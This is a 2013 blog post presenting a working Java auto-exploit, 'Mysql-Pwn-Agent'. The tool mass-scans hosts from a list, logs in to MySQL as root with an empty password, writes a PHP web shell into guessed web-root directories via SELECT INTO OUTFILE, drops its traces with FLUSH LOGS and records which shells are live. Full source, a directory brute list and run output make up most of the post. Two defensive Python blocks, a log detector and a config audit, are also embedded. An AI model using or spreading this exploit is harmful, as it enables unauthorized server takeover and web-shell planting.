
Saturday, February 9, 2013

Mysql-Pwn-Agent Beta


 

Hello and good morning to all readers. I got up quite early today, and in fact I slept very late last night. Argh...

But I'm done with Mysql-Pwn-Agent Beta.

Mysql Pwn Agent is an auto-exploit for MySQL plus any Windows HTTP server; I use XAMPP for testing.

Here is my simple PoC (proof of concept).


After some days of playing with Java JDBC and XAMPP's MySQL and Apache, I finished writing the exploit. Thanks to Yeohwa for some hints.

Here are some screenshots.

We need a test server: start XAMPP with the Apache web server and the MySQL database.

 


 

Get the exploit and add some IPs to scan.txt. Add your base64-encoded PHP shell code to shell.txt, then start the exploit. You can use php/reverse/metapreter/ from Metasploit to get a reverse shell, but it does not work well with my online-check shell class because the Metasploit PHP reverse shell never stops loading. Better to use any PHP shell or my simple upload script.

 

The PoC exploit:

 


 

Exploit output when it fails. It creates a random database and table on every attempt, and uses dir.txt to brute-force Apache's htdocs root directory in order to upload the shell, then checks whether the shell is online.

 

#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database rcdmiwb
Creating Table rcdmiwb
rcdmiwb Table created successfully...
rcdmiwb Connecting to database rcdmiwb Again...
Insert Shell Into Table rcdmiwb...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\rcdmiwb.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database bffatwe
Creating Table bffatwe
bffatwe Table created successfully...
bffatwe Connecting to database bffatwe Again...
Insert Shell Into Table bffatwe...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\bffatwe.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################






Exploit output when it succeeds.



#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database tdduvjs
Creating Table tdduvjs
tdduvjs Table created successfully...
tdduvjs Connecting to database tdduvjs Again...
Insert Shell Into Table tdduvjs...
Creating outfile to hdd...
Upload /xampp/htdocs/tdduvjs.php Done...
Successfully Exploit Done ...
Connecting to database tdduvjs Again...
Drop Database tdduvjs...
Successfully Dropped tdduvjs Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database memaarx
Creating Table memaarx
memaarx Table created successfully...
memaarx Connecting to database memaarx Again...
Insert Shell Into Table memaarx...
Creating outfile to hdd...
Upload /xampp/htdocs/memaarx.php Done...
Successfully Exploit Done ...
Connecting to database memaarx Again...
Drop Database memaarx...
Successfully Dropped memaarx Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!


Now it finds the document root, we win, and your shells are ready ;)
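Both runs above issue the same statement chain: a throwaway database, a PHP string inserted into a table, INTO OUTFILE to a .php path named after that database, and on success DROP DATABASE followed by FLUSH LOGS. As an added example (not part of the original post), this Python script looks for that chain in a MySQL general query log; the log lines are constructed and it assumes the general log was enabled on the server.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample in the MySQL 5.x general query log layout (optional
# timestamp, thread id, command, argument); not captured from a real host.
SAMPLE_LOG = (
    "130209 12:14:58\t   40 Connect\troot@localhost on\n"
    "\t\t   40 Query\tCREATE DATABASE rcdmiwb\n"
    "\t\t   41 Connect\troot@localhost on rcdmiwb\n"
    "\t\t   41 Query\tINSERT INTO user_upload VALUES ('<?php sleep(10); /* payload elided */ ?>')\n"
    "\t\t   41 Query\tselect * into outfile 'C:/mysql-admin/rcdmiwb.php'from user_upload\n"
    "130209 12:15:01\t   42 Connect\troot@localhost on\n"
    "\t\t   42 Query\tCREATE DATABASE tdduvjs\n"
    "\t\t   43 Connect\troot@localhost on tdduvjs\n"
    "\t\t   43 Query\tINSERT INTO user_upload VALUES ('<?php sleep(10); /* payload elided */ ?>')\n"
    "\t\t   43 Query\tselect * into outfile 'C:/xampp/htdocs/tdduvjs.php'from user_upload\n"
    "\t\t   44 Connect\troot@localhost on tdduvjs\n"
    "\t\t   44 Query\tDROP DATABASE tdduvjs\n"
    "\t\t   44 Query\tFLUSH LOGS\n"
    "130209 12:20:00\t   50 Connect\tapp@localhost on shop\n"
    "\t\t   50 Query\tSELECT id, name FROM products INTO OUTFILE 'C:/backup/products.csv'\n"
)

LINE_RE = re.compile(
    r"^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(\d+)\s+(Connect|Query|Init DB|Quit)\s*(.*)$")
OUTFILE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+'([^']+)'", re.I)
CREATE_DB_RE = re.compile(
    r"^\s*create\s+(?:database|schema)\s+(?:if\s+not\s+exists\s+)?`?(\w+)`?", re.I)
DROP_DB_RE = re.compile(
    r"^\s*drop\s+(?:database|schema)\s+(?:if\s+exists\s+)?`?(\w+)`?", re.I)
FLUSH_RE = re.compile(r"^\s*flush\s+logs\b", re.I)
# Extensions a web server may execute; an assumption, adjust to the handlers in use.
SCRIPT_EXT = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}


def parse_statements(log_text):
    """Yield (thread_id, command, argument); continuation lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m.group(1)), m.group(2), m.group(3)


def analyze(log_text):
    """Return one finding per OUTFILE write of a script file, with chain signals."""
    created, dropped, php_inserts, flushes, writes = {}, {}, [], [], []
    for idx, (thread, cmd, arg) in enumerate(parse_statements(log_text)):
        if cmd != "Query":
            continue
        if (m := CREATE_DB_RE.match(arg)):
            created[m.group(1).lower()] = idx
        elif (m := DROP_DB_RE.match(arg)):
            dropped[m.group(1).lower()] = idx
        elif FLUSH_RE.match(arg):
            flushes.append(idx)
        elif re.match(r"\s*insert\b", arg, re.I) and "<?php" in arg.lower():
            php_inserts.append(idx)
        if (m := OUTFILE_RE.search(arg)):
            path = PureWindowsPath(m.group(1))
            if path.suffix.lower() in SCRIPT_EXT:
                writes.append((idx, thread, path))

    findings = []
    for idx, thread, path in writes:
        stem, signals = path.stem.lower(), ["script_outfile"]
        # The tool names the dropped file after its random database.
        if stem in created and created[stem] < idx:
            signals.append("file_named_after_new_database")
        if any(i < idx for i in php_inserts):
            signals.append("php_inserted_before_write")
        if stem in dropped and dropped[stem] > idx:
            signals.append("database_dropped_after_write")
            if any(i > dropped[stem] for i in flushes):
                signals.append("flush_logs_after_drop")
        elif stem in created and stem not in dropped:
            # A failed write skips the cleanup, so the database stays on the server.
            signals.append("database_left_behind")
        findings.append({"thread": thread, "path": path.as_posix(), "signals": signals})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

FLUSH LOGS closes and reopens the log files rather than erasing them, so the chain stays readable in the general log. A database_left_behind hit also points at a leftover database holding a user_upload table, which is worth looking for on the server itself.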



Look in results.txt; the shells are saved there.



#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
Shell Date: 09.02.2013 12:15
#######################################################################

#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
Shell Date: 09.02.2013 12:15
#######################################################################


The result with the base64-encoded upload script:






Yeahhhhhh, we got an upload script to upload your shell. Nothing new … ;)



Have pfun



main.java



package sploit;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.sql.Connection;
import java.sql.Date;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.sql.Statement;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.GregorianCalendar;
import java.util.Random;
import java.util.Scanner;

import sploit.checkshell;

public class main {
// JDBC driver name and database URL
static String output = null;
static String outputshell = null;

// Database credentials
static final String USER = "root";
static final String PASS = "";

/**
* @param args
* @throws IOException
*/



public static void main(String[] args) throws IOException {
System.out.println(" Mysql-Pwn-Agent-Exploit Beta 1 ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");

System.out.print("Press 2x Enter to fire ...");
Scanner sc = new Scanner(System.in);
while(!sc.nextLine().equals(""));
sc.nextLine();
sc.close();

// Open the file that is the first
// command line parameter
FileInputStream dirstream10 = new FileInputStream("shell.txt");
// Get the object of DataInputStream
DataInputStream dir0 = new DataInputStream(dirstream10);
BufferedReader b10 = new BufferedReader(new InputStreamReader(dir0));
String strLine10;
//Read File Line By Line

//Read File Line By Line
while ((strLine10 = b10.readLine()) != null) {
// Print the content on the console
String shell = strLine10;
//System.out.println (shell);

try{
// Open the file that is the first
// command line parameter
FileInputStream dirstream1 = new FileInputStream("dir.txt");
// Get the object of DataInputStream
DataInputStream dir = new DataInputStream(dirstream1);
BufferedReader b1 = new BufferedReader(new InputStreamReader(dir));
String strLine1;
//Read File Line By Line

//Read File Line By Line
while ((strLine1 = b1.readLine()) != null) {
// Print the content on the console
String dirbrute = strLine1;
//System.out.println (strLine1);


// Open the file that is the first
// command line parameter
FileInputStream fstream = new FileInputStream("scan.txt");
// Get the object of DataInputStream
DataInputStream in = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String strLine;


while ((strLine = br.readLine()) != null) {
// Print the content on the console
//System.out.println (strLine);

//Main Connect to db
Connection conn = null;
Statement stmt = null;
try{
//STEP 1: Init Random
Random ran = new Random();
int top = 6;
char data = ' ';
String dat = "";

for (int i=0; i<=top; i++) {
data = (char)(ran.nextInt(25)+97);
dat = data + dat;
}

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");
final String DB_URL = "jdbc:mysql://"+strLine+"/";
final String DB_URL3 = "jdbc:mysql://"+strLine+"/"+dat+"";
final String DB_URL2 = "jdbc:mysql://"+strLine+"/"+dat+"";


//STEP 3: Open a connection
System.out.println("#######################################################################");
System.out.println("###########################by cr4shyyy#################################");
System.out.println("#######################################################################");
System.out.println("Connecting to database..."+strLine);

conn = DriverManager.getConnection(DB_URL, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Creating database "+dat);
stmt = conn.createStatement();
String sql = "CREATE DATABASE "+dat;
stmt.executeUpdate(sql);
//System.out.println("Done...");

System.out.println("Creating Table "+dat);
String sql2 = "CREATE TABLE `"+dat+"`.`user_upload` (`track2` VARCHAR( 55060 ) NOT NULL) ENGINE = MYISAM ;";
stmt.executeUpdate(sql2);
//System.out.println("Done...");
System.out.println(dat+" Table created successfully...");

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");

//STEP 3: Open a connection
System.out.println(dat+" Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL2, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Insert Shell Into Table "+dat+"...");
stmt = conn.createStatement();
String sql0 = "INSERT INTO user_upload " + "VALUES ('<?php sleep(10);" +shell+ "" + " ?>')";
stmt.executeUpdate(sql0);
//System.out.println("Done...");



System.out.println("Creating outfile to hdd...");
String sql4 = "select * into outfile 'C:"+""+dirbrute+""+dat.toString() +".php'" + "from user_upload";

stmt.executeQuery(sql4);

System.out.println("Upload "+strLine1+""+ dat +".php Done...");
System.out.println("Successfully Exploit Done ...");


//STEP 3: Open a connection
System.out.println("Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL3, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Drop Database "+dat+"...");
stmt = conn.createStatement();
String sql01 = "DROP DATABASE "+dat;
stmt.executeUpdate(sql01);
//System.out.println("Done...");
System.out.println("Successfully Dropped "+dat+" Table ...");

System.out.println("Flush logs ...");
stmt = conn.createStatement();
String sql1 = "FLUSH LOGS";
stmt.executeUpdate(sql1);
//System.out.println("Done...");
System.out.println("Successfully FLUSH Logs Done ...");
System.out.println("#######################################################################");
System.out.println("#######################################################################");
if ((checkshell.exists("http://"+strLine+"/"+""+dat+".php")) == true) {
System.out.println("By Security-is-just-an-illusion.blogspot.de");
System.out.println("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
//System.out.println(checkshell.exists("http://"+strLine+"/"+""+dat+".php"));
FileWriter writer;
File file;
file = new File("results.txt");
writer = new FileWriter(file ,true);
writer.write(System.getProperty("line.separator"));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.write(System.getProperty("line.separator"));
writer.write("By http://Security-is-just-an-illusion.blogspot.de");
writer.write(System.getProperty("line.separator"));
writer.write("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
writer.write(System.getProperty("line.separator"));
GregorianCalendar now=new GregorianCalendar();
DateFormat df=DateFormat.getDateInstance(DateFormat.MEDIUM);
writer.write("Shell Date: "+df.format(now.getTime())+" ");
//System.out.println("Shell Date: "+df.format(now.getTime())+" ");
df=DateFormat.getTimeInstance(DateFormat.SHORT);
//System.out.println(df.format(now.getTime()));
writer.write(df.format(now.getTime()));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.flush();
writer.close();
}

else{
System.out.println("Shell_Exploit-Negativ.");
}

System.out.println("#######################################################################");
System.out.println("#######################################################################");

}catch(SQLException se){
//Handle errors for JDBC
System.err.println("SQLState: " +
((SQLException)se).getSQLState());
System.err.println("Error Code: " +
((SQLException)se).getErrorCode());
System.err.println("Message: " + se.getMessage());
}catch(Exception e){
//Handle errors for Class.forName
e.printStackTrace();
}finally{
//finally block used to close resources
try{
if(stmt!=null)
stmt.close();
}catch(SQLException se2){
}// nothing we can do
try{
if(conn!=null)
conn.close();
}catch(SQLException se){
System.out.println("SQL Fehler "+se.getMessage());
}//end finally try
}//end try
System.out.println("Goodbye by http://security-is-just-an-illusion.blogspot.de!");
//END

}
}
//Close the input stream
dir.close();
}catch (Exception e){//Catch exception if any
System.err.println("Error: " + e.getMessage());
}
}
}

private static boolean blub(String string) {
// TODO Auto-generated method stub
return false;
}
}
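main.java depends on three conditions: the server is reachable over the network, root logs in with an empty password, and SELECT ... INTO OUTFILE may write below the web root. As an added example (not code from the original post), this Python audit checks the [mysqld] section of a my.ini for the two settings that live in that file; both ini fragments are constructed, and the account state (root password, FILE privilege) sits in the grant tables and has to be checked separately.

```python
import configparser
import ipaddress

# Constructed my.ini fragments for illustration; not taken from a real install.
WEAK_INI = """
[mysqld]
port = 3306
basedir = "C:/xampp/mysql"
skip-external-locking
"""

HARDENED_INI = """
[mysqld]
port = 3306
basedir = "C:/xampp/mysql"
bind-address = 127.0.0.1
secure-file-priv = "C:/xampp/mysql/export"
skip-external-locking
"""


def audit_mysqld(ini_text, web_root_markers=("htdocs", "www")):
    """Return issue codes for [mysqld] settings that leave OUTFILE-to-web-root open.

    web_root_markers is a hypothetical list of directory names that indicate a
    web root; adjust it to the layout of the host being audited.
    """
    cp = configparser.ConfigParser(allow_no_value=True, strict=False,
                                   interpolation=None, delimiters=("=",))
    cp.read_string(ini_text)
    opts = {}
    if cp.has_section("mysqld"):
        # MySQL treats '-' and '_' in option names as equivalent.
        opts = {k.replace("-", "_"): (v or "").strip().strip('"')
                for k, v in cp.items("mysqld")}
    issues = []

    # Assumption: a server generation (MySQL 5.5-era builds) where an unset or
    # empty secure_file_priv places no restriction on the OUTFILE directory.
    sfp = opts.get("secure_file_priv", "")
    if not sfp:
        issues.append("secure_file_priv_unrestricted")
    elif any(m in sfp.lower().replace("\\", "/").split("/") for m in web_root_markers):
        issues.append("secure_file_priv_inside_web_root")

    # Without bind-address the server listens on all interfaces.
    if "skip_networking" not in opts:
        addr = opts.get("bind_address", "*")
        try:
            loopback = ipaddress.ip_address(addr).is_loopback
        except ValueError:
            loopback = addr.lower() == "localhost"
        if not loopback:
            issues.append("listens_beyond_loopback")

    # skip-grant-tables disables authentication altogether.
    if "skip_grant_tables" in opts:
        issues.append("grant_tables_disabled")
    return issues


if __name__ == "__main__":
    print("weak:", audit_mysqld(WEAK_INI))
    print("hardened:", audit_mysqld(HARDENED_INI))
```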


Checkshell.java






package sploit;
import java.net.*;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
try {
HttpURLConnection.setFollowRedirects(false);
// note : you may also need
// HttpURLConnection.setInstanceFollowRedirects(false)
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setRequestMethod("HEAD");
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
e.printStackTrace();
return false;
}
}
}



shell.txt







dir.txt



/htdocs/
/phpmyadmin/
/phpMyAdmin/
/PMA/
/pma/
/admin/
/dbadmin/
/mysql/
/myadmin/
/phpmyadmin2/
/phpMyAdmin2/
/phpMyAdmin-2/
/php-my-admin/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
/mysqladmin/
/mysql-admin/
/xampp/htdocs/
/APMServ5.2.6/www/htdocs/
/www/htdocs/




Use it for personal use or study purposes.
